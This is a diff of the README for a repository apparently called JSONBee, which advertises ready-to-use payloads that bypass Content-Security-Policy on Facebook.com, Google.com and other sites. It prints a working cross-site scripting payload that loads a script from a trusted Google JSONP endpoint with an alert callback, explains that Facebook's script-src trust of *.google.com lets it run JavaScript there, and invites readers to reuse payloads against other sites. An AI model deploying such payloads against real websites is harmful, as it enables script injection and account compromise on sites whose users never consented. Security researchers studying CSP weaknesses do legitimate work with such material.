zigoo0/JSONBee/README.md

 The repo contains ready-to-use payloads that can bypass CSP for Facebook.com, Google.com and more.

 ## Bypasing Facebook.com Content-Security policy:
-Facebook.com allows *.google.com in its CSP policy, thus, below payload would work like a charm:
+Facebook.com allows *.google.com in its CSP policy (script-src directive), thus, below payload would work like a charm to execute JavaScript on Facebook.com:
 `"><script+src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback=alert(1337)"></script>`

 If you came across a website that trusts any of the domains in jsonp.txt file in its script-src directive, then pickup a payload  that matches the domain and have fun :)